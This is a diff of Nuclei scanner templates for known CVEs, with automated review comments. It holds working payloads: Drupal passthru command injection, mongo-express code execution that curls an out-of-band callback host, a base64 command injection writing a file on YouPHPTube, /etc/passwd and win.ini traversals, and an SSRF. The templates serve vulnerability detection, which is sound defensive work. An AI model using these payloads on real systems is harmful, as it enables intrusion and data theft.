reference: - https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py - https://nvd.nist.gov/vuln/detail/CVE-2018-7602 - - https://www.drupal.org/sa-core-2018-004 - - https://www.exploit-db.com/exploits/44557/ - - http://www.securitytracker.com/id/1040754 + tags: cve,cve2018,drupal,authenticated classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2018-7602 - epss-score: 0.97448 - epss-percentile: 0.99947 - cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* - metadata: - max-request: 4 - vendor: drupal - product: drupal - shodan-query: http.component:"drupal" - tags: cve,cve2018,drupal,authenticated,kev,vulhub,edb -http: +requests: - raw: - | POST /?q=user%2Flogin HTTP/1.1 @@ -37,15 +21,18 @@ http: Content-Type: application/x-www-form-urlencoded form_id=user_login&name={{username}}&pass={{password}}&op=Log+in + - | GET /?q={{url_encode("{{userid}}")}}%2Fcancel HTTP/1.1 Host: {{Hostname}} + - | POST /?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account + - | POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1 Host: {{Hostname}} @@ -53,7 +40,8 @@ http: form_build_id={{form_build_id}} - host-redirects: true + cookie-reuse: true + redirects: true max-redirects: 2 matchers: - type: word 
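Review bot: In the second hunk `redirects: true` replaces `host-redirects: true`, so the scanner now follows redirects to any host while `cookie-reuse: true` carries the authenticated Drupal session along — a target can bounce the privileged follow-up requests off-site with the session cookie attached. If the older `requests:` schema this commit reverts to lacks `host-redirects`, prefer leaving redirects off and matching on the 302 directly; otherwise keep `host-redirects: true` with `max-redirects: 2`. The command payload (`echo COP-2067-8102-EVC | rev`) and the surrounding raw requests are unchanged context.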
@@ -62,26 +50,25 @@ http: extractors: - type: regex + part: body name: userid + internal: true group: 1 regex: - '' - internal: true - part: body - type: regex + part: body name: form_build_id + internal: true group: 1 regex: - '' - internal: true - part: body -# digest: 4a0a0047304502204dec12f369a9044e8dc3ba9c641723199442f60a3736e83f89caca37cd8118b5022100cda38fa6e52e8717c3073dff9123fc3707428e477982dd4549e372892f2a082e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2018-7662.yaml b/poc/cve/cve-2018-7662.yaml index 4296c733cd..eb56470249 100644 --- a/poc/cve/cve-2018-7662.yaml +++ b/poc/cve/cve-2018-7662.yaml 
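Review bot: As rendered here both extractors' `regex:` lists hold only an empty string (`- ''`), which would extract nothing and leave `{{userid}}` and `{{form_build_id}}` unresolved in the later requests; this is likely HTML stripped by the page export rather than the file's real content, so confirm in the repository that the original capture patterns (the `group: 1` references imply a capturing group) are intact on both sides. The reorder of `part: body` and `internal: true` is cosmetic and fine.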
@@ -1,42 +1,25 @@ id: CVE-2018-7662 info: - name: CouchCMS <= 2.0 - Path Disclosure + name: CouchCMS Full Path Disclosure author: ritikchaddha severity: medium - description: CouchCMS <= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php. - impact: | - An attacker can exploit this vulnerability to gain knowledge of the server's directory structure, potentially aiding in further attacks. - remediation: | - Upgrade to the latest version of CouchCMS (2.1 or higher) to mitigate this vulnerability. - reference: - - https://github.com/CouchCMS/CouchCMS/issues/46 - - https://nvd.nist.gov/vuln/detail/CVE-2018-7662 - - https://github.com/20142995/Goby - - https://github.com/5ecurity/CVE-List - - https://github.com/ARPSyndicate/cvemon + description: phpmailer.php and mysql2i.func.php disclosure the full path + reference: https://github.com/CouchCMS/CouchCMS/issues/46 + tags: couchcms,fpd,cve,cve2018 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2018-7662 cwe-id: CWE-200 - epss-score: 0.00292 - epss-percentile: 0.65908 - cpe: cpe:2.3:a:couchcms:couch:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: couchcms - product: couch - tags: cve2018,cve,couchcms,fpd -http: +requests: - method: GET path: - "{{BaseURL}}/includes/mysql2i/mysql2i.func.php" - "{{BaseURL}}/addons/phpmailer/phpmailer.php" stop-at-first-match: true - matchers-condition: or matchers: - type: word @@ -52,4 +35,3 @@ http: - "phpmailer.php on line 10" - "Fatal error: Call to a menber function add_event_listener() on a non-object in" condition: and -# digest: 490a0046304402207bc6bc4a86c8bf73bc4bc1fe83c3fb63108f1b1b77ac110b33a6af75a7a3a8ad02203036732893f9ba2208c741cd3a825d7d73f9870d11029f0c14d7098e0bc302cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/poc/cve/cve-2018-9161.yaml b/poc/cve/cve-2018-9161.yaml index d3295f40cc..5db121e528 100644 --- a/poc/cve/cve-2018-9161.yaml +++ b/poc/cve/cve-2018-9161.yaml 
@@ -4,31 +4,18 @@ info: name: PrismaWEB - Credentials Disclosure author: gy741 severity: critical - description: PrismaWEB is susceptible to credential disclosure. The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. - impact: | - An attacker could gain unauthorized access to the application and potentially compromise user accounts and sensitive data. - remediation: | - Ensure that sensitive credentials are properly protected and not exposed in the application's source code or configuration files. + description: The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. 
reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php - https://nvd.nist.gov/vuln/detail/CVE-2018-9161 - - https://www.exploit-db.com/exploits/44276/ - - https://github.com/ARPSyndicate/kenzer-templates + tags: cve,cve2018,prismaweb,exposure classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 + cvss-score: 9.80 cve-id: CVE-2018-9161 cwe-id: CWE-798 - epss-score: 0.12574 - epss-percentile: 0.95318 - cpe: cpe:2.3:a:prismaindustriale:checkweigher_prismaweb:1.21:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: prismaindustriale - product: checkweigher_prismaweb - tags: cve2018,cve,prismaweb,exposure,edb,prismaindustriale -http: +requests: - method: GET path: - "{{BaseURL}}/user/scripts/login_par.js" @@ -45,4 +32,3 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ffcd63af862f8b9aa24f999ad152b190ff12a716891947bdfcdf6f8928420413022006b1c871ad6ce93fb773c74b29e916effe0a6cb129653f58c5c4eb406cccfe6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2019-10758.yaml b/poc/cve/cve-2019-10758.yaml index 92d6c6e83f..9ce3a78eca 100644 --- a/poc/cve/cve-2019-10758.yaml +++ b/poc/cve/cve-2019-10758.yaml 
@@ -4,32 +4,20 @@ info: name: mongo-express Remote Code Execution author: princechaddha severity: critical - description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. - remediation: Upgrade mongo-express to version 0.54.0 or higher. + description: "mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment." reference: - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 - https://nvd.nist.gov/vuln/detail/CVE-2019-10758 - - https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215 - - https://github.com/CLincat/vulcat - - https://github.com/MelanyRoob/Goby + remediation: Upgrade mongo-express to version 0.54.0 or higher. + metadata: + shodan-query: http.title:"Mongo Express" classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H - cvss-score: 9.9 + cvss-score: 9.90 cve-id: CVE-2019-10758 - epss-score: 0.97429 - epss-percentile: 0.99934 - cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* - metadata: - max-request: 1 - vendor: mongo-express_project - product: mongo-express - framework: node.js - shodan-query: http.title:"Mongo Express" - tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js + tags: cve,cve2019,mongo,mongo-express -http: +requests: - raw: - | POST /checkValid HTTP/1.1 
@@ -37,11 +25,11 @@ http: Authorization: Basic YWRtaW46cGFzcw== Content-Type: application/x-www-form-urlencoded - document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}") - + document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl http://{{interactsh-url}}") matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a004830460221008b43b36836d54fe57119d7fbc9c2c7bbf83a5c28c40a75eb6347457778a45bc6022100fe8bb104228123301a28b551a1badd14112e0aa18bce53387295571b79c7b827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/03/29 diff --git a/poc/cve/cve-2019-17503.yaml b/poc/cve/cve-2019-17503.yaml new file mode 100644 index 0000000000..a3b8e66c08 --- /dev/null +++ b/poc/cve/cve-2019-17503.yaml @@ -0,0 +1,35 @@ +id: CVE-2019-17503 + +info: + name: Kirona Dynamic Resource Scheduling - information disclosure + author: LogicalHunter + severity: medium + description: An unauthenticated user can access /osm/REGISTER.cmd (aka /osm_tiles/REGISTER.cmd) directly _ it contains sensitive information about the database through the SQL queries within this batch file + reference: + - https://www.exploit-db.com/exploits/47498 + - https://nvd.nist.gov/vuln/detail/CVE-2019-17503 + tags: cve,cve2019,exposure + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2019-17503 + cwe-id: CWE-425 + +requests: + - method: GET + path: + - "{{BaseURL}}/osm/REGISTER.cmd" + - "{{BaseURL}}/osm_tiles/REGISTER.cmd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - "DEBUGMAPSCRIPT=TRUE" + - "@echo off" + condition: and 
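Review bot: The request still hardcodes `Authorization: Basic YWRtaW46cGFzcw==`, which decodes to `admin:pass` (the vulhub lab default), so the template only ever fires against that one credential pair even though the vulnerability needs any valid login (`PR:L`). Parameterize it, e.g. `Authorization: Basic {{base64(concat(username, ':', password))}}` or an equivalent helper expression, with `admin`/`pass` as the documented defaults. Prefixing `http://` to `{{interactsh-url}}` is harmless since curl assumes it anyway.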
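Review bot: The description has a stray `_` where punctuation belongs (`directly _ it contains sensitive information`); write `…directly; it contains sensitive information about the database through the SQL queries within this batch file.` The `name` uses lowercase `information disclosure` while sibling templates capitalize the vulnerability class (`Information Disclosure`).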
diff --git a/poc/cve/cve-2019-5127.yaml b/poc/cve/cve-2019-5127.yaml new file mode 100644 index 0000000000..07c1505179 --- /dev/null +++ b/poc/cve/cve-2019-5127.yaml @@ -0,0 +1,47 @@ +id: CVE-2019-5127 + +info: + name: YouPHPTube Encoder RCE + author: pikpikcu + severity: critical + description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack. + reference: https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917 + tags: cve,cve2019,rce + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2019-5127 + cwe-id: CWE-78 + +requests: + - method: GET + path: + - "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" # CVE-2019-5127 + - "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" # CVE-2019-5128 + - "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" # CVE-2019-5129 + headers: + Content-Type: application/x-www-form-urlencoded + - method: GET + path: + - "{{BaseURL}}/objects/nuclei.txt" + headers: + Content-Type: application/x-www-form-urlencoded + + matchers-condition: and + matchers: + - type: word + words: + - "uid=" + - "gid=" + - "groups=" + condition: and + part: body + + - type: word + words: + - text/plain + part: header + + - type: status + status: + - 200 diff --git a/poc/cve/cve-2019-6715.yaml b/poc/cve/cve-2019-6715.yaml new file mode 100644 index 0000000000..16bbedcfc0 --- /dev/null +++ b/poc/cve/cve-2019-6715.yaml 
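Review bot: The `base64Url` payload `YGlkID4gbnVjbGVpLnR4dGA=` decodes to `` `id > nuclei.txt` ``, so every scan writes a file into the target's `/objects/` directory (the second request then fetches `/objects/nuclei.txt`) and nothing ever removes it — the template leaves an artifact on production hosts, and all three CVE payloads fire unconditionally since there is no `stop-at-first-match`. Prefer a non-persistent check (an out-of-band callback to `{{interactsh-url}}`, or a DSL timing match on a `sleep` command) and, if the file write is kept, state the artifact in `description` and add `stop-at-first-match: true` to the first request. The `Content-Type` header on body-less GET requests is dead weight, and the `name`/`description` should mention that CVE-2019-5128 and CVE-2019-5129 are also exercised.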
@@ -0,0 +1,30 @@ +id: CVE-2019-6715 + +info: + name: CVE-2019-6715 + author: randomrobbie + severity: high + description: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF + tags: cve,cve2019,wordpress,wp-plugin,ssrf + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2019-6715 + reference: + - https://vinhjaxt.github.io/2019/03/cve-2019-6715 + - http://packetstormsecurity.com/files/160674/WordPress-W3-Total-Cache-0.9.3-File-Read-Directory-Traversal.html + +requests: + - raw: + - | + PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + {"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"} + + matchers: + - type: word + words: + - "TmVzc3VzQ29kZUV4ZWNUZXN0" + part: body \ No newline at end of file diff --git a/poc/cve/cve-2020-10547.yaml b/poc/cve/cve-2020-10547.yaml index 3585b75926..445f4d31d4 100644 --- a/poc/cve/cve-2020-10547.yaml +++ b/poc/cve/cve-2020-10547.yaml @@ -1,12 +1,18 @@ -id: cve-2020-10547 +id: CVE-2020-10547 info: name: rConfig 3.9.4 SQLi author: madrobot - severity: high + severity: critical description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because, by default, nodes' passwords are stored in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices. - reference: https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py + reference: + https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/ tags: cve,cve2020,rconfig,sqli + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-10547 + cwe-id: CWE-89,CWE-522 requests: - method: GET 
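Review bot: `SubscribeURL` makes the target fetch `https://rfi.nessus.org/rfi.txt`, a host the project does not control, and the match key `TmVzc3VzQ29kZUV4ZWNUZXN0` (base64 of `NessusCodeExecTest`) assumes that file's content never changes — if Tenable moves or edits it the template silently stops detecting. Use `{{interactsh-url}}` as the `SubscribeURL` and match on `interactsh_protocol` instead. Separately, `name: CVE-2019-6715` should carry the title that now sits in `description` (`name: W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated Arbitrary File Read / SSRF`), and the body is JSON while `Content-Type` says `application/x-www-form-urlencoded` (sns.php may ignore it — confirm).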
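Review bot: As rendered, the new `reference:` is followed by two indented URLs with no `- ` list markers, which YAML folds into one scalar `https://github.com/… https://theguly.github.io/…` — a single bogus reference instead of two. Make it a list: `- https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py` and `- https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/`. The request block continues outside the hunk.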
diff --git a/poc/cve/cve-2020-12447.yaml b/poc/cve/cve-2020-12447.yaml index 941f7e0b40..5d68fba753 100644 --- a/poc/cve/cve-2020-12447.yaml +++ b/poc/cve/cve-2020-12447.yaml @@ -1,40 +1,27 @@ id: CVE-2020-12447 - info: name: Onkyo TX-NR585 Web Interface - Directory Traversal author: 0x_Akoko severity: high - description: Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal and local file inclusion. - impact: | - An attacker can access sensitive files on the system, potentially leading to unauthorized access, information disclosure, or further exploitation. - remediation: | - Apply the latest firmware update provided by the vendor to fix the directory traversal vulnerability. + description: A Local File Inclusion (LFI) issue on Onkyo TX-NR585 1000-0000-000-0008-0000 devices allows remote unauthenticated users on the network to read sensitive files via %2e%2e%2f directory traversal reference: - https://blog.spookysec.net/onkyo-lfi - - https://nvd.nist.gov/vuln/detail/CVE-2020-12447 - - https://blog.spookysec.net/onkyo-lfi/ - - https://github.com/ARPSyndicate/kenzer-templates + - https://www.cvedetails.com/cve/CVE-2020-12447 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-12447 cwe-id: CWE-22 - epss-score: 0.01711 - epss-percentile: 0.8752 - cpe: cpe:2.3:o:onkyo:tx-nr585_firmware:1000-0000-000-0008-0000:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: onkyo - product: tx-nr585_firmware tags: cve,cve2020,onkyo,lfi,traversal -http: +requests: - method: GET path: - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd" matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" 
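Review bot: The matcher `root:[x*]:0:0`, right after the blank line this hunk adds, only accepts `x` or `*` in root's password field; on an embedded receiver like this `/etc/passwd` may carry an empty field or the hash itself, in which case a successful read is reported as a miss. `root:[^:]*:0:0` covers all three forms with no extra false positives. The status matcher that follows is outside the hunk.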
@@ -42,4 +29,3 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100927c1a44689d7680e0dee3d0c8c5daf8e08fd834eb2fbb5cfea86f3a531c00b9022100c9621cde469f6eace4647eeeb2c70aeea221843a6410e3c169dd9a1f9d162936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-15050.yaml b/poc/cve/cve-2020-15050.yaml index e51ec40239..c3a0c4953d 100644 --- a/poc/cve/cve-2020-15050.yaml +++ b/poc/cve/cve-2020-15050.yaml 
@@ -1,34 +1,21 @@ id: CVE-2020-15050 info: - name: Suprema BioStar <2.8.2 - Local File Inclusion + name: Suprema BioStar2 - Local File Inclusion (LFI) author: gy741 severity: high - description: Suprema BioStar before 2.8.2 Video Extension allows remote attackers can read arbitrary files from the server via local file inclusion. - impact: | - An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server. - remediation: | - Upgrade Suprema BioStar to version 2.8.2 or later to fix the LFI vulnerability. + description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal. reference: - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html - https://www.supremainc.com/en/support/biostar-2-pakage.asp - https://nvd.nist.gov/vuln/detail/CVE-2020-15050 - - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.50 cve-id: CVE-2020-15050 - cwe-id: CWE-22 - epss-score: 0.55214 - epss-percentile: 0.97597 - cpe: cpe:2.3:a:supremainc:biostar_2:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: supremainc - product: biostar_2 - tags: cve,cve2020,suprema,biostar2,packetstorm,lfi,supremainc + tags: cve,cve2020,lfi,suprema,biostar2 -http: +requests: - method: GET path: - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini" @@ -41,4 +28,3 @@ http: - "fonts" - "extensions" condition: and -# digest: 490a00463044022027582fd4cb0e0721dcad8ad6dedd262cd3be8b49cf72e43e17a2d9945178024a02205c1ba847b18c648f8f13e7cd4e6e20f76079e24b2801869c1f78c3d40cc310ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
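Review bot: The new `cvss-metrics` vector `C:H/I:H/A:H` evaluates to 9.8 under CVSS 3.1, but `cvss-score` stays at 7.50, and the bug is an unauthenticated file read with no integrity or availability impact, so the removed `C:H/I:N/A:N` vector is the one consistent with both the score and the traversal. Restore `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N` and keep `cwe-id: CWE-22`, which the hunk also drops. The name change from `<2.8.2` to `BioStar2` loses the affected-version bound that the description still states.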
diff --git a/poc/cve/cve-2020-18268.yaml b/poc/cve/cve-2020-18268.yaml index ba4395254f..033c62e51b 100644 --- a/poc/cve/cve-2020-18268.yaml +++ b/poc/cve/cve-2020-18268.yaml @@ -1,34 +1,21 @@ id: CVE-2020-18268 info: - name: Z-Blog <=1.5.2 - Open Redirect + name: Z-BlogPHP 1.5.2 Open redirect author: 0x_Akoko severity: medium - description: Z-Blog 1.5.2 and earlier contains an open redirect vulnerability via the redirect parameter in zb_system/cmd.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. - impact: | - An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the execution of further attacks. - remediation: | - Upgrade Z-Blog to version 1.5.3 or later to fix the open redirect vulnerability. + description: Open Redirect in Z-BlogPHP v1.5.2 and earlier allows remote attackers to obtain sensitive information via the "redirect" parameter in the component "zb_system/cmd.php." reference: - https://github.com/zblogcn/zblogphp/issues/216 - - https://github.com/zblogcn/zblogphp/issues/209 - - https://nvd.nist.gov/vuln/detail/CVE-2020-18268 - - https://github.com/ARPSyndicate/kenzer-templates + - https://www.cvedetails.com/cve/CVE-2020-18268 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2020-18268 cwe-id: CWE-601 - epss-score: 0.00147 - epss-percentile: 0.49792 - cpe: cpe:2.3:a:zblogcn:z-blogphp:*:*:*:*:*:*:*:* - metadata: - max-request: 2 - vendor: zblogcn - product: z-blogphp - tags: cve,cve2020,redirect,zblogphp,authenticated,zblogcn + tags: cve,cve2020,redirect,zblogphp,authenticated -http: +requests: - raw: - | POST /zb_system/cmd.php?act=verify HTTP/1.1 
@@ -38,13 +25,14 @@ http: Connection: close btnPost=Log+In&username={{username}}&password={{md5("{{password}}")}}&savedate=0 + - | - GET /zb_system/cmd.php?atc=login&redirect=http://www.interact.sh HTTP/2 + GET /zb_system/cmd.php?atc=login&redirect=http://www.example.com HTTP/2 Host: {{Hostname}} + cookie-reuse: true matchers: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100bd3922005e2f1f83e8fc6d03ed0821320876192c346fd423f1e365de6eecda67022007afefdc8787c536742bd021c8c77fecf9c9783282077289ed30c3e2ee522665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 diff --git a/poc/cve/cve-2020-26876.yaml b/poc/cve/cve-2020-26876.yaml index 6559ee1788..2fdc04789f 100644 --- a/poc/cve/cve-2020-26876.yaml +++ b/poc/cve/cve-2020-26876.yaml 
@@ -1,32 +1,41 @@ id: CVE-2020-26876 + info: name: WordPress WP Courses Plugin Information Disclosure author: dwisiswant0 severity: high description: WordPress WP Courses Plugin < 2.0.29 contains a critical information disclosure which exposes private course videos and materials. - tags: wordpress,plugin reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-26876 - https://www.exploit-db.com/exploits/48910 - https://www.redtimmy.com/critical-information-disclosure-on-wp-courses-plugin-exposes-private-course-videos-and-materials/ + - https://plugins.trac.wordpress.org/changeset/2388997 classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2020-26876 + cwe-id: CWE-306 + tags: cve,cve2020,wordpress,wp-plugin,exposure,edb + requests: - method: GET path: - "{{BaseURL}}/wp-json/wp/v2/lesson/1" + matchers-condition: and matchers: - type: regex + part: body regex: - "rest_post_invalid_id" - "\"(guid|title|content|excerpt)\":{\"rendered\":" condition: or - part: body + - type: word + part: header words: - "application/json" - part: header + - type: status status: - 200 diff --git a/poc/cve/cve-2020-27866.yaml b/poc/cve/cve-2020-27866.yaml index 0bd51729fb..81151b66a4 100644 --- a/poc/cve/cve-2020-27866.yaml +++ b/poc/cve/cve-2020-27866.yaml 
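Review bot: With the newly added `matchers-condition: and` and the status matcher pinned to `200`, the `rest_post_invalid_id` alternative in the regex matcher can no longer fire: WordPress returns that REST error with a 404 status, so any response containing it fails the status matcher. Either drop that string from the regex list or, if matching the error response is intended, allow it in the status matcher (`- 200` and `- 404`). Keeping only the `"(guid|title|content|excerpt)":{"rendered":` pattern with 200 is the stricter and more meaningful check, since that is the exposed lesson content the advisory describes.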
@@ -4,8 +4,8 @@ info: name: NETGEAR Authentication Bypass vulnerability author: gy741 severity: high - description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, - Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. + description: This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R6020, R6080, R6120, R6220, R6260, R6700v2, R6800, R6900v2, R7450, JNR3210, WNR2020, Nighthawk AC2100, and Nighthawk AC2400 routers. Authentication is not required to exploit this vulnerability. + tags: cve,cve2020,netgear,auth-bypass reference: - https://wzt.ac.cn/2021/01/13/AC2400_vuln/ - https://www.zerodayinitiative.com/advisories/ZDI-20-1451/ @@ -13,10 +13,9 @@ info: - https://kb.netgear.com/000062641/Security-Advisory-for-Password-Recovery-Vulnerabilities-on-Some-Routers classification: cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 8.8 + cvss-score: 8.80 cve-id: CVE-2020-27866 cwe-id: CWE-288 - tags: cve,cve2020,netgear,auth-bypass requests: - raw: diff --git a/poc/cve/cve-2020-35846.yaml b/poc/cve/cve-2020-35846.yaml index ed4b8dd6b7..b012cee002 100644 --- a/poc/cve/cve-2020-35846.yaml +++ b/poc/cve/cve-2020-35846.yaml @@ -1,4 +1,4 @@ -id: cve-2020-35846 +id: CVE-2020-35846 info: name: Cockpit prior to 0.12.0 NoSQL injection in /auth/check 
@@ -8,7 +8,12 @@ info: Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value. reference: https://swarm.ptsecurity.com/rce-cockpit-cms/ - tags: cve,cve2020,nosqli,sqli + tags: cve,cve2020,nosqli,sqli,cockpit,injection + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2020-35846 + cwe-id: CWE-89 requests: - method: POST diff --git a/poc/cve/cve-2020-36365.yaml b/poc/cve/cve-2020-36365.yaml index c3116b81e6..771c887368 100644 --- a/poc/cve/cve-2020-36365.yaml +++ b/poc/cve/cve-2020-36365.yaml 
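Review bot: `cwe-id: CWE-89` classifies this as SQL injection, but the name, description and the `nosqli` tag on the same new side describe NoSQL injection through the `$eq` operator, for which CWE-943 (Improper Neutralization of Special Elements in Data Query Logic) is the closer weakness; check the NVD record before settling on one. The description still says `Cockpit before 0.11.2` while the name says `prior to 0.12.0`; the two version bounds should be reconciled against the referenced advisory.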
